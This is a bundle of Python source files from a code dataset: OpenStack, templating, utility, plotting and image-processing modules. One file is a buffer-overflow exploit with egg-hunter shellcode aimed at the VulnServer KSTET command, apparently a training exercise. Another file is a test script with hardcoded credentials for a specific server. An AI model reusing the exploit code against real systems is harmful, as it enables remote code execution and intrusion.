_cidr.list_subnet_cidrs\n\nget_networking_extensions = _extension.get_networking_extensions\nmissing_networking_extensions = _extension.missing_networking_extensions\nhas_networking_extensions = _extension.has_networking_extensions\nskip_if_missing_networking_extensions = (\n _extension.skip_if_missing_networking_extensions)\n\ncreate_floating_ip = _floating_ip.create_floating_ip\ndelete_floating_ip = _floating_ip.delete_floating_ip\nget_floating_ip = _floating_ip.get_floating_ip\nget_floating_ip_id = _floating_ip.get_floating_ip_id\nfind_floating_ip = _floating_ip.find_floating_ip\nlist_floating_ips = _floating_ip.list_floating_ips\nupdate_floating_ip = _floating_ip.update_floating_ip\nFloatingIpType = _floating_ip.FloatingIpType\nFloatingIpIdType = _floating_ip.FloatingIpIdType\nNoSuchFloatingIp = _floating_ip.NoSuchFloatingIp\n\ncreate_port = _port.create_port\ndelete_port = _port.delete_port\nget_port = _port.get_port\nget_port_id = _port.get_port_id\nfind_device_ip_address = _port.find_device_ip_address\nfind_port = _port.find_port\nfind_port_ip_address = _port.find_port_ip_address\nlist_ports = _port.list_ports\nlist_port_ip_addresses = _port.list_port_ip_addresses\nlist_device_ip_addresses = _port.list_device_ip_addresses\nupdate_port = _port.update_port\nPortType = _port.PortType\nPortIdType = _port.PortIdType\nNoSuchPort = _port.NoSuchPort\n\nget_neutron_quota_set = _quota_set.get_neutron_quota_set\nset_neutron_quota_set = 
_quota_set.set_neutron_quota_set\nensure_neutron_quota_limits = _quota_set.ensure_neutron_quota_limits\nEnsureNeutronQuotaLimitsError = _quota_set.EnsureNeutronQuotaLimitsError\n\ncreate_network = _network.create_network\ndelete_network = _network.delete_network\nget_network = _network.get_network\nget_network_id = _network.get_network_id\nfind_network = _network.find_network\nlist_networks = _network.list_networks\nlist_network_nameservers = _network.list_network_nameservers\nNoSuchNetwork = _network.NoSuchNetwork\nNetworkType = _network.NetworkType\nNetworkIdType = _network.NetworkIdType\n\nadd_router_interface = _router.add_router_interface\ncreate_router = _router.create_router\ndelete_router = _router.delete_router\nget_ovs_router_namespace = _router.get_ovs_router_namespace\nget_router = _router.get_router\nget_router_id = _router.get_router_id\nremove_router_interface = _router.remove_router_interface\nwait_for_master_and_backup_agents = _router.wait_for_master_and_backup_agents\nRouterType = _router.RouterType\nRouterIdType = _router.RouterIdType\nNoSuchRouter = _router.NoSuchRouter\n\ncreate_subnet = _subnet.create_subnet\ndelete_subnet = _subnet.delete_subnet\nensure_subnet_gateway = _subnet.ensure_subnet_gateway\nget_subnet = _subnet.get_subnet\nget_subnet_id = _subnet.get_subnet_id\nfind_subnet = _subnet.find_subnet\nlist_subnets = _subnet.list_subnets\nSubnetType = _subnet.SubnetType\nSubnetIdType = _subnet.SubnetIdType\nNoSuchSubnet = _subnet.NoSuchSubnet\n","sub_path":"tobiko/openstack/neutron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"443748148","text":"import requests\n\nfrom mtxapi.api.Base_Api import Base_Api\n\n\nclass Mtx_Safe(Base_Api):\n\n def login(self):\n url = 'http://121.42.15.146:9090/mtx/index.php?s=/index/user/login.html'\n headers = {\n 'X-Requested-With': 'XMLHttpRequest',\n }\n data = {\n 'accounts': 'li40',\n 'pwd': '123456'\n }\n res = requests.post(url=url, headers=headers, data=data)\n print(res.cookies)\n return res.cookies\n\n def safe(self,my,new,confirm):\n path = '/mtx/index.php?s=/index/safety/loginpwdupdate.html'\n data = {\n \"my_pwd\": my,\n \"new_pwd\": new,\n \"confirm_new_pwd\": confirm\n }\n res = self.mtx_post(path,data)\n return res\n\n def safe_no(self):\n \"\"\"\n Standalone request that does not use the inherited helper\n :return:\n \"\"\"\n url = \"http://121.42.15.146:9090/mtx/index.php?s=/index/safety/loginpwdupdate.html\"\n headers = {\"X-Requested-With\":\"XMLHttpRequest\"}\n data = {\n \"my_pwd\": '123456',\n \"new_pwd\": '123456',\n \"confirm_new_pwd\": '123456'\n }\n res = requests.post(url=url,headers=headers,cookies=self.login(),data=data)\n print(res)\n print(res.text)\n\n\n\nif __name__ == '__main__':\n obj = Mtx_Safe()\n obj.safe_no()","sub_path":"mtxapi/api/Mtx_Safe.py","file_name":"Mtx_Safe.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"29133739","text":"\"\"\"More pythonic for tag for python mode of liquidpy\"\"\"\nfrom lark import v_args\nfrom .transformer import TagTransformer\nfrom .inherited import Tag, tag_manager\nfrom ...tags.transformer import render_segment\n\n@v_args(inline=True)\nclass TagForTransformer(TagTransformer):\n \"\"\"Transformer for tag for\"\"\"\n # pylint: disable=no-self-use\n def tag_for(self, varname, *args):\n \"\"\"Transformer for tag for\"\"\"\n varnames = (varname, *args[:-1])\n return 
tuple(str(vname) for vname in varnames), args[-1]\n\n@tag_manager.register\nclass TagFor(Tag):\n \"\"\"The for tag\n\n Attributes:\n flag_break: The flag for break statement\n flag_continue: The flag for continue statement\n cycles: The cycle object for cycle tags\n \"\"\"\n __slots__ = Tag.__slots__ + ('flag_break', 'flag_continue')\n\n START = 'tag_for'\n GRAMMAR = 'tag_for: var (\",\" var)* \"in\" output'\n TRANSFORMER = TagForTransformer()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.flag_break = False # type: bool\n self.flag_continue = False # type: bool\n\n\n def _render(self, local_vars, global_vars):\n # type: (dict, dict) -> str\n rendered = ''\n\n varnames, value = self.parsed\n value = render_segment(value, local_vars, global_vars)\n local_vars_inside = local_vars.copy()\n for elem in value:\n if not isinstance(elem, (tuple, list)):\n elem = (elem,)\n for i, varname in enumerate(varnames):\n local_vars_inside[varname] = elem[i]\n\n for child in self.children:\n child_rendered, _ = child.render(local_vars_inside,\n global_vars)\n rendered += child_rendered\n if self.flag_continue or self.flag_break:\n self.flag_continue = False\n break\n if self.flag_break:\n break\n\n if not value or not self.flag_break: # for ... else\n rendered += self._render_next(local_vars, global_vars, True)\n return rendered\n","sub_path":"liquid/python/tags/tag_for.py","file_name":"tag_for.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427855063","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n#\r\n# Copyright (c) 2016 Stephen Bunn \r\n# MIT License \r\n\r\n\"\"\"\r\nutil\r\n.. module:: scrab\r\n :platform: Linux, MacOSX, Win32\r\n :synopsis:\r\n :created: 2016-09-14T20:50:27-04:00\r\n :modified: 2016-09-14T20:50:27-04:00\r\n.. 
moduleauthor:: Stephen Bunn (ritashugisha@gmail.com)\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport hashlib\r\nimport webbrowser\r\nimport subprocess\r\nimport urllib.request\r\n\r\n\r\ndef url_exists(url, timeout=5):\r\n \"\"\" Determines if a url exists.\r\n :param url: The url to check\r\n :type url: str\r\n :param timeout: Seconds to wait for request to respond\r\n :type timeout: int\r\n :rtype: bool\r\n \"\"\"\r\n\r\n try:\r\n return (urllib.request.urlopen(url, timeout=timeout).code == 200)\r\n except (ValueError, urllib.error.URLError, urllib.request.HTTPError):\r\n pass\r\n return False\r\n\r\n\r\ndef download(url, filepath, overwrite=False):\r\n \"\"\" Download a file from a url to a given filepath.\r\n :param url: The URL to retrieve\r\n :type url: str\r\n :param filepath: The filepath to store the retrieved content\r\n :type filepath: str\r\n :param overwrite: Flag to indiciate if files should be overwritten\r\n :type overwrite: bool\r\n :rtyp: bool\r\n \"\"\"\r\n\r\n filepath = os.path.abspath(filepath)\r\n if isinstance(url, str) and len(url) > 0:\r\n resp = urllib.request.urlopen(url)\r\n if resp.getcode() != 200:\r\n raise ValueError((\r\n \"invalid url read response, '{resp}'\"\r\n ).format(resp=resp))\r\n if os.path.isdir(os.path.dirname(filepath)):\r\n if overwrite or not os.path.isfile(filepath):\r\n # Downloading file to filepath\r\n with open(filepath, 'w') as fp:\r\n fp.write(resp.read().decode('utf-8'))\r\n return True\r\n # File already exists, not overwriting\r\n return False\r\n # Parent directory to store file does not exists\r\n return False\r\n return False\r\n\r\n\r\ndef browser_open(url, window=True):\r\n \"\"\" Wrapper for opening a browser window to a given url.\r\n :param url: The URL to open\r\n :type url: str\r\n :param window: Flag to indicate if URL should be opened in new window\r\n :type window: bool\r\n \"\"\"\r\n\r\n webbrowser.open(url, new=(1 if window else 2))\r\n\r\n\r\ndef run_subprocess(process):\r\n \"\"\" Run a subprocess.\r\n :param process: List or string command to be run\r\n :type process: list/str\r\n :rtype: tuple\r\n \"\"\"\r\n\r\n return subprocess.Popen((\r\n [str(_) for _ in process]\r\n if (isinstance(process, list) and len(process) > 0) else\r\n [str(process)]\r\n ),\r\n shell=isinstance(process, str),\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.PIPE\r\n ).communicate()\r\n\r\n\r\ndef checksum(hash_algorithm, filepath, chunksize=4096):\r\n \"\"\" Returns the checksum of a given file.\r\n\r\n :param hashtype: The type of has to generate (md5, sha256, sha512, ...)\r\n :type hashtype: str\r\n :param filepath: The absolute path to the file\r\n :type filepath: str\r\n :param chunksize: The chunksize (bytes) for reading the file (default 4096)\r\n :type: int\r\n :returns: The md5 checksum of the given file\r\n :rtype: str\r\n \"\"\"\r\n\r\n if hash_algorithm in hashlib.algorithms_guaranteed:\r\n\r\n hash_ = getattr(hashlib, hash_algorithm)()\r\n with open(filepath, 'rb') as f:\r\n for chunk in iter(lambda: f.read(chunksize), b''):\r\n hash_.update(chunk)\r\n return hash_.hexdigest()\r\n\r\n raise ValueError((\r\n \"no available algorithm '{hash_algorithm}', \"\r\n \"available are {hashlib.algorithms_guaranteed}\"\r\n ).format(hash_algorithm=hash_algorithm, hashlib=hashlib))\r\n","sub_path":"scrab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309974590","text":"# -*- coding: utf-8 -*-\nimport 
logging\nimport time\nimport six\nimport socket\nfrom datetime import datetime\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _convert_timestamp(timestamp):\n '''\n :param timestamp: datetime with the timestamp date and time or str in the appropriate format\n :return: string with the corresponding date and time\n '''\n\n if not timestamp:\n return int(time.time())\n elif type(timestamp) is datetime:\n return time.mktime(timestamp.timetuple())\n elif type(timestamp) is str:\n _datetime = datetime.strptime(timestamp[0:19], '%Y-%m-%dT%H:%M:%S')\n return int(time.mktime(_datetime.timetuple()))\n elif type(timestamp) is unicode:\n _datetime = datetime.strptime(timestamp[0:19], '%Y-%m-%dT%H:%M:%S')\n return int(time.mktime(_datetime.timetuple()))\n else:\n logger.info('%s is not a valid timestamp type', type(timestamp))\n raise TypeError\n\n\ndef send_metric(server, port, environment, metric, value, tags=None, timestamp=None):\n '''\n Send metric to graphite\n :param server: server domain name\n :param port: metric server port\n :param environment: current environment (dev, stage, production)\n :param metric: metric name\n :param value: metric value\n :param tags: list of tags in the form [{'key1': value1},...,{'keyN': valueN}]\n :param timestamp: datetime with metric time\n :return:\n '''\n\n # In python3, celery converts datetime to a string.\n ts = _convert_timestamp(timestamp)\n\n metric_path = environment + '.'\n\n if tags:\n for tag in tags:\n for item in tag.items():\n metric_path += item[1] + '.'\n\n metric_path += metric\n\n sock = socket.socket()\n sock.connect((server, int(port)))\n sock.send(six.b(\"%s %f %d\\n\" % (metric_path, value, ts)))\n sock.close()\n","sub_path":"python_metrics_client/graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"148019495","text":"class UnionFind:\n\n def __init__(self):\n self.groups = []\n self.parent = dict()\n self.rank = dict()\n\n def make_set(self, elem):\n self.parent[elem] = elem\n self.rank[elem] = 0\n self.groups.append(elem)\n\n def find(self, elem):\n if elem not in self.parent:\n return None\n\n if elem != self.parent[elem]:\n self.parent[elem] = self.find(self.parent[elem])\n return self.parent[elem]\n\n def union(self, u, v):\n root_u = self.find(u)\n root_v = self.find(v)\n\n if root_u == root_v or root_u is None or root_v is None:\n return\n\n if self.rank[root_u] > self.rank[root_v]:\n self.parent[root_v] = root_u\n self.groups.remove(root_v)\n else:\n self.parent[root_u] = root_v\n self.groups.remove(root_u)\n if self.rank[root_u] == self.rank[root_v]:\n self.rank[root_v] += 1\n\n def size(self):\n return len(self.groups)\n","sub_path":"document_generation/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"559072723","text":"import numpy as np\nimport pylab\nimport matplotlib.patches as patches\n\nfrom ray.abstract_ray import ARay\nimport view.matlab.sphere_ellipse_data2D as spell\n\nfrom surfaces.surface import Surface\nfrom surfaces.analitic.plane import Plane\nfrom surfaces.analitic.sphere import Sphere\nfrom surfaces.analitic.ellipse import Ellipse\nfrom surfaces.limited_surface import LimitedSurface\n\n\ndef draw_plane(plane: Plane, color=\"blue\", alpha=0.5):\n # matrix of rotation\n m = [[0, -1],\n [1, 0]]\n # direction vector\n r = np.dot(m, 
plane.norm_vec([]))\n # coords = vray.collect_point_to_draw(r,)\n point = [ARay.calc_point_of_ray_(r, plane.rad, 10_000),\n ARay.calc_point_of_ray_(r, plane.rad, -10_000)]\n\n line = pylab.Line2D([point[i][0] for i in range(2)],\n [point[i][1] for i in range(2)], color=color, alpha=alpha)\n pylab.gca().add_line(line)\n\n\ndef draw_sphere(sphere: Sphere, color='b', alpha=0.5):\n sphere = pylab.Circle(sphere.center, sphere.r, fill=False, color=color, alpha=alpha)\n pylab.gca().add_patch(sphere)\n\n\ndef draw_ellipse(ellipse: Ellipse, color='b', alpha=0.5):\n ellipse = patches.Ellipse(ellipse.center, 2 * ellipse.abc[0], 2 * ellipse.abc[1], fill=False, color=color, alpha=alpha)\n pylab.gca().add_patch(ellipse)\n\n\ndef draw_limited_plane(plane: LimitedSurface, color=\"blue\", alpha=0.5):\n surface = plane.surface\n if not isinstance(surface, Plane):\n return\n norm = surface.norm_vec(point=[])\n const = np.dot(surface.rad, norm)\n limits = plane.limits\n # keep the unique values\n x = {-(const + limits[1][i] * norm[1]) / norm[0] for i in range(2)}\n y = {-(const + limits[0][i] * norm[0]) / norm[1] for i in range(2)}\n x.update(limits[0])\n y.update(limits[1])\n\n x = list(x)\n y = list(y)\n\n line = None\n belong_points = set()\n for k in range(len(x)):\n for l in range(len(y)):\n point = (x[k], y[l])\n if surface.is_point_belong(point) and plane.is_point_in_limits(point):\n belong_points.add(point)\n\n belong_points = list(belong_points)\n if len(belong_points) == 2:\n line = pylab.Line2D([belong_points[i][0] for i in range(2)],\n [belong_points[i][1] for i in range(2)])\n pylab.gca().add_line(line)\n return\n\n\ndef draw_limited_ellipse(ellipse: LimitedSurface, color='b', alpha=0.5):\n # get the stretch coefficients along the axes\n to_draw = None\n\n surface = ellipse.surface\n lim = ellipse.limits\n\n if isinstance(surface, Sphere):\n center = surface.center\n to_draw = spell.Sphere_Ellipse_data_2Dview.get_sphere2D(10 ** -2, center, surface.r)\n elif isinstance(surface, Ellipse):\n center = surface.center\n to_draw = spell.Sphere_Ellipse_data_2Dview.get_ellipse2D(10 ** -2, center, surface.abc)\n else:\n return\n\n # queues\n to_cuting_pre = [to_draw]\n to_cuing_cur = []\n\n for k in range(len(lim)):\n while len(to_cuting_pre) > 0:\n val = to_cuting_pre.pop(0)\n to_cuing_cur.extend(__cut(val, lim, k))\n\n to_cuting_pre = to_cuing_cur\n to_cuing_cur = []\n\n for line in to_cuting_pre:\n pylab.plot(line[0], line[1], color=color, alpha=alpha)\n\n\ndef __cut(to_draw: iter, lim: iter, k: int) -> iter:\n\n # slice along one axis at a time\n xy_index_begin = []\n xy_index_end = []\n in_range_prev = False\n i = 0\n for i, val in enumerate(to_draw[k]):\n exp = lim[k][0] <= val and val <= lim[k][1]\n if exp != in_range_prev:\n if exp:\n xy_index_begin.append(i)\n else:\n xy_index_end.append(i)\n in_range_prev = exp\n\n if len(xy_index_end) < len(xy_index_begin):\n xy_index_end.append(len(to_draw[0]))\n\n to_draw2 = []\n for i, j in zip(xy_index_begin, xy_index_end):\n to_draw2.append([])\n to_draw2[len(to_draw2) - 1].append(to_draw[0][i:j])\n to_draw2[len(to_draw2) - 1].append(to_draw[1][i:j])\n return to_draw2\n\n\ndef draw_limits(surface: LimitedSurface, color: str = \"black\", alpha: float = 0.5):\n lim = surface.limits\n planes = [\n Plane([lim[0][0], 0], [1, 0]),\n Plane([lim[0][1], 0], [1, 0]),\n Plane([0, lim[1][0]], [0, 1]),\n Plane([0, lim[1][1]], [0, 1]),\n ]\n for plane in planes:\n draw_plane(plane, color=color, alpha=alpha)\n\n\ndef 
draw_exist_surface(surface: Surface, color: str = \"blue\", alpha: float = 1.):\n \"\"\"\n draw existing surface: Plane,Sphere,Ellipse and\n LimitedSurface, where surface is limited Plane,Sphere,Ellipse\n :return:\n \"\"\"\n if isinstance(surface, Plane):\n draw_plane(surface, color=color, alpha=alpha)\n elif isinstance(surface, Sphere):\n draw_sphere(surface, color=color, alpha=alpha)\n elif isinstance(surface, Ellipse):\n draw_ellipse(surface, color=color, alpha=alpha)\n elif isinstance(surface, LimitedSurface):\n inner_surface = surface.surface\n if isinstance(inner_surface, Plane):\n draw_limited_plane(surface, color=color, alpha=alpha)\n elif isinstance(inner_surface, (Sphere, Ellipse)):\n draw_limited_ellipse(surface, color=color, alpha=alpha)\n else:\n raise ValueError(\"Not supporting surface \" + str(surface))\n","sub_path":"view/matlab/matlab_surface_view2D.py","file_name":"matlab_surface_view2D.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349114683","text":"#!/usr/bin/python\nimport socket\n\npayload = \"\"\npayload += \"HACKHACK\"\n\nRHOST = \"\"\n\nRPORT = 9999\n# Address of JMP ESP\nEIP = \"\\xaf\\x11\\x50\\x62\"\negg_hunter = b\"\"\negg_hunter += b\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\"\negg_hunter += b\"\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x48\\x41\\x43\\x4b\"\negg_hunter += b\"\\x89\\xd7\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\nbuffer = \"\"\nbuffer += \"KSTET \"\nbuffer += \"\\x90\" * 2\nbuffer += egg_hunter\nbuffer += \"\\x90\" * (70 - 2 - len(egg_hunter))\nbuffer += EIP\nbuffer += \"\\xeb\\xb4\"\nbuffer += \"\\x90\" * (1000 - len(buffer))\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint(\"[*] Connecting to \" + RHOST + \" on port \" + str(RPORT))\nconnection.connect((RHOST, RPORT))\nconnection.recv(1024)\nprint(\"[*] Sending payload\")\nconnection.send(\"STATS \" + payload)\nconnection.close()\nprint(\"[*] Payload had been sent\")\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint(\"[*] Connecting to \" + RHOST + \" on port \" + str(RPORT))\nconnection.connect((RHOST, RPORT))\nconnection.recv(1024)\nprint(\"[*] Sending exploit\")\nconnection.send(buffer)\nconnection.close()\nprint(\"[*] Exploit had been sent\")\n","sub_path":"Exploits/VulnServer/Exploits/KSTET-Egg-Hunter.py","file_name":"KSTET-Egg-Hunter.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"567680810","text":"from collections import defaultdict, MutableMapping\nimport itertools\nimport os\nimport warnings\n\nfrom csmapi import csmapi\nimport numpy as np\nimport pandas as pd\n\nfrom plio.io.io_gdal import GeoDataset\nfrom plio.io.isis_serial_number import generate_serial_number\nfrom skimage.transform import resize\nimport shapely\nfrom knoten.csm import generate_latlon_footprint, generate_vrt, create_camera, generate_boundary\n\nfrom autocnet.matcher import cpu_extractor as fe\nfrom autocnet.matcher import cpu_outlier_detector as od\nfrom autocnet.cg import cg\nfrom autocnet.io.db.model import Images, Keypoints, Matches, Cameras, Base, Overlay, Edges, Costs, Points, Measures\nfrom autocnet.io.db.connection import Parent\nfrom autocnet.io import keypoints as io_keypoints\nfrom autocnet.vis.graph_view import plot_node\nfrom autocnet.utils import utils\n\n\nclass Node(dict, MutableMapping):\n \"\"\"\n This class represents a node in a graph and 
is synonymous with an\n image. The node (image) stores PATH information, an accessor to the\n on-disk data set, and correspondences information that references the image.\n\n\n Attributes\n ----------\n image_name : str\n Name of the image, with extension\n\n image_path : str\n Relative or absolute PATH to the image\n\n geodata : object\n File handle to the object\n\n keypoints : dataframe\n With columns, x, y, and response\n\n nkeypoints : int\n The number of keypoints found for this image\n\n descriptors : ndarray\n 32-bit array of feature descriptors returned by OpenCV\n\n masks : set\n A list of the available masking arrays\n\n ignore : bool\n If the image is flagged as ignored and will be skipped in processing\n\n isis_serial : str\n If the input images have PVL headers, generate an\n ISIS compatible serial number\n \"\"\"\n\n def __init__(self, image_name=None, image_path=None, node_id=None):\n self['image_name'] = image_name\n self['image_path'] = image_path\n self['node_id'] = node_id\n self['hash'] = image_name\n self.masks = pd.DataFrame()\n\n @property\n def camera(self):\n if not hasattr(self, '_camera'):\n self._camera = None\n return self._camera\n\n @camera.setter\n def camera(self, camera):\n self._camera = camera\n\n @property\n def descriptors(self):\n if not hasattr(self, '_descriptors'):\n self._descriptors = None\n return self._descriptors\n\n @descriptors.setter\n def descriptors(self, desc):\n self._descriptors = desc\n\n @property\n def keypoints(self):\n if not hasattr(self, '_keypoints'):\n self._keypoints = pd.DataFrame()\n return self._keypoints\n\n @keypoints.setter\n def keypoints(self, kps):\n self._keypoints = kps\n\n @property\n def ignore(self):\n if not hasattr(self, '_ignore'):\n self._ignore = False\n return self._ignore\n\n @ignore.setter\n def ignore(self, ignore):\n self._ignore = ignore\n\n def __repr__(self):\n return \"\"\"\n NodeID: {}\n Image Name: {}\n Image PATH: {}\n Number Keypoints: {}\n Available Masks : {}\n Type: {}\n \"\"\".format(self['node_id'], self['image_name'], self['image_path'],\n self.nkeypoints, self.masks, self.__class__)\n\n def __hash__(self): #pragma: no cover\n return hash(self['node_id'])\n\n def __gt__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid > oid\n\n def __ge__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid >= oid\n\n def __lt__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid < oid\n\n def __le__(self, other):\n myid = self['node_id']\n oid = other['node_id']\n return myid <= oid\n\n def __str__(self):\n return str(self['node_id'])\n\n def __eq__(self, other):\n return self['node_id'] == other\n\n @classmethod\n def create(cls, image_name, node_id, basepath=None):\n try:\n image_name = os.path.basename(image_name)\n except: pass # Use the input name even if not a valid PATH\n if basepath is not None:\n image_path = os.path.join(basepath, image_name)\n else:\n image_path = image_name\n return cls(image_name, image_path, node_id)\n\n @property\n def geodata(self):\n if not hasattr(self, '_geodata'):\n self._geodata = GeoDataset(self['image_path'])\n return self._geodata\n\n @property\n def footprint(self):\n if not getattr(self, '_footprint', None):\n try:\n self._footprint = shapely.wkt.loads(self.geodata.footprint.GetGeometryRef(0).ExportToWkt())\n except:\n return None\n return self._footprint\n\n @property\n def isis_serial(self):\n \"\"\"\n Generate an ISIS compatible serial number using the data file\n associated with 
this node. This assumes that the data file\n has a PVL header.\n \"\"\"\n if not hasattr(self, '_isis_serial'):\n try:\n self._isis_serial = generate_serial_number(self['image_path'])\n except:\n self._isis_serial = None\n return self._isis_serial\n\n @property\n def nkeypoints(self):\n try:\n return len(self.keypoints)\n except:\n return 0\n\n def coverage(self):\n \"\"\"\n Determines the area of keypoint coverage\n using the unprojected image, resulting\n in a rough estimation of the percentage area\n being covered.\n\n Returns\n -------\n coverage_area : float\n percentage area covered by the generated\n keypoints\n \"\"\"\n\n points = self.get_keypoint_coordinates()\n hull = cg.convex_hull(points)\n hull_area = hull.volume\n\n max_x = self.geodata.raster_size[0]\n max_y = self.geodata.raster_size[1]\n total_area = max_x * max_y\n\n return hull_area / total_area\n\n def get_byte_array(self, band=1):\n \"\"\"\n Get a band as a 32-bit numpy array\n\n Parameters\n ----------\n band : int\n The band to read, default 1\n \"\"\"\n\n array = self.geodata.read_array(band=band)\n return utils.bytescale(array)\n\n def get_array(self, band=1, **kwargs):\n \"\"\"\n Get a band as a 32-bit numpy array\n\n Parameters\n ----------\n band : int\n The band to read, default 1\n \"\"\"\n\n array = self.geodata.read_array(band=band, **kwargs)\n return array\n\n def get_keypoints(self, index=None):\n \"\"\"\n Return the keypoints for the node. If index is passed, return\n the appropriate subset.\n Parameters\n ----------\n index : iterable\n indices for of the keypoints to return\n Returns\n -------\n : dataframe\n A pandas dataframe of keypoints\n \"\"\"\n if index is not None:\n return self.keypoints.loc[index]\n else:\n return self.keypoints\n\n def get_keypoint_coordinates(self, index=None, homogeneous=False):\n \"\"\"\n Return the coordinates of the keypoints without any ancillary data\n\n Parameters\n ----------\n index : iterable\n indices for of the keypoints to return\n\n homogeneous : bool\n If True, return homogeneous coordinates in the form\n [x, y, 1]. Default: False\n\n Returns\n -------\n : dataframe\n A pandas dataframe of keypoint coordinates\n \"\"\"\n if index is None:\n keypoints = self.keypoints[['x', 'y']]\n else:\n keypoints = self.keypoints.loc[index][['x', 'y']]\n\n if homogeneous:\n keypoints = keypoints.assign(homogeneous = 1)\n return keypoints\n\n def get_raw_keypoint_coordinates(self, index=slice(None)):\n \"\"\"\n The performance of get_keypoint_coordinates can be slow\n due to the ability for fancier indexing. 
This method\n returns coordinates using numpy array accessors.\n\n Parameters\n ----------\n index : iterable\n positional indices to return from the global keypoints dataframe\n \"\"\"\n return self.keypoints.values[index,:2]\n\n @staticmethod\n def _extract_features(array, *args, **kwargs): # pragma: no cover\n \"\"\"\n Extract features for the node\n\n Parameters\n ----------\n array : ndarray\n\n kwargs : dict\n kwargs passed to autocnet.cpu_extractor.extract_features\n\n \"\"\"\n pass\n\n def extract_features(self, array, xystart=[], camera=None, *args, **kwargs):\n\n new_keypoints, new_descriptors = Node._extract_features(array, *args, **kwargs)\n count = len(self.keypoints)\n\n # If this is a tile, push the keypoints to the correct start xy\n if xystart:\n new_keypoints['x'] += xystart[0]\n new_keypoints['y'] += xystart[1]\n\n concat_kps = pd.concat((self.keypoints, new_keypoints))\n concat_kps.reset_index(inplace=True, drop=True)\n concat_kps.drop_duplicates(inplace=True)\n # Removed duplicated and re-index the merged keypoints\n\n # Update the descriptors to be the same size as the keypoints, maintaining alignment\n if self.descriptors is not None:\n concat = np.concatenate((self.descriptors, new_descriptors))\n else:\n concat = new_descriptors\n new_descriptors = concat[concat_kps.index.values]\n\n self.descriptors = new_descriptors\n self.keypoints = concat_kps.reset_index(drop=True)\n\n lkps = len(self.keypoints)\n\n assert lkps == len(self.descriptors)\n\n if lkps > 0:\n return True\n\n def extract_features_from_overlaps(self, overlaps=[], downsampling=False, tiling=False, *args, **kwargs):\n # iterate through the overlaps\n # check for downsampling or tiling and dispatch as needed to that func\n # that should then dispatch to the extract features func\n pass\n\n def extract_features_with_downsampling(self, downsample_amount,\n array_read_args={}, *args, **kwargs):\n \"\"\"\n Extract interest points for the this node (image) by first downsampling,\n then applying the extractor, and then upsampling the results backin to\n true image space.\n\n Parameters\n ----------\n downsample_amount : int\n The amount to downsample by\n \"\"\"\n array_size = self.geodata.raster_size\n total_size = array_size[0] * array_size[1]\n shape = (int(array_size[0] / downsample_amount),\n int(array_size[1] / downsample_amount))\n array = resize(self.geodata.read_array(**array_read_args), shape, preserve_range=True)\n self.extract_features(array, *args, **kwargs)\n\n self.keypoints['x'] *= downsample_amount\n self.keypoints['y'] *= downsample_amount\n\n if len(self.keypoints) > 0:\n return True\n\n def extract_features_with_tiling(self, tilesize=1000, overlap=500, *args, **kwargs):\n array_size = self.geodata.raster_size\n slices = utils.tile(array_size, tilesize=tilesize, overlap=overlap)\n for s in slices:\n xystart = [s[0], s[1]]\n array = self.geodata.read_array(pixels=s)\n self.extract_features(array, xystart, *args, **kwargs)\n\n if len(self.keypoints) > 0:\n return True\n\n def project_keypoints(self):\n if self.camera is None:\n # Without a camera, it is not possible to project\n warnings.warn('Unable to project points, no camera available.')\n return False\n # Project the sift keypoints to the ground\n def func(row, args):\n camera = args[0]\n imagecoord = csmapi.ImageCoord(float(row[1]), float(row[0]))\n # An elevation at the ellipsoid is plenty accurate for this work\n gnd = getattr(camera, 'imageToGround')(imagecoord, 0)\n return [gnd.x, gnd.y, gnd.z]\n feats = self.keypoints[['x', 
'y']].values\n gnd = np.apply_along_axis(func, 1, feats, args=(self.camera, ))\n gnd = pd.DataFrame(gnd, columns=['xm', 'ym', 'zm'], index=self.keypoints.index)\n self.keypoints = pd.concat([self.keypoints, gnd], axis=1)\n\n return True\n\n def load_features(self, in_path, format='npy', **kwargs):\n \"\"\"\n Load keypoints and descriptors for the given image\n from a HDF file.\n\n Parameters\n ----------\n in_path : str or object\n PATH to the hdf file or a HDFDataset object handle\n\n format : {'npy', 'hdf'}\n The format that the features are stored in. Default: npy.\n \"\"\"\n if format == 'npy':\n keypoints, descriptors = io_keypoints.from_npy(in_path)\n elif format == 'hdf':\n keypoints, descriptors = io_keypoints.from_hdf(in_path, **kwargs)\n\n self.keypoints = keypoints\n self.descriptors = descriptors\n\n def save_features(self, out_path):\n \"\"\"\n Save the extracted keypoints and descriptors to\n the given file. By default, the .npz files are saved\n along side the image, e.g. in the same folder as the image.\n\n Parameters\n ----------\n out_path 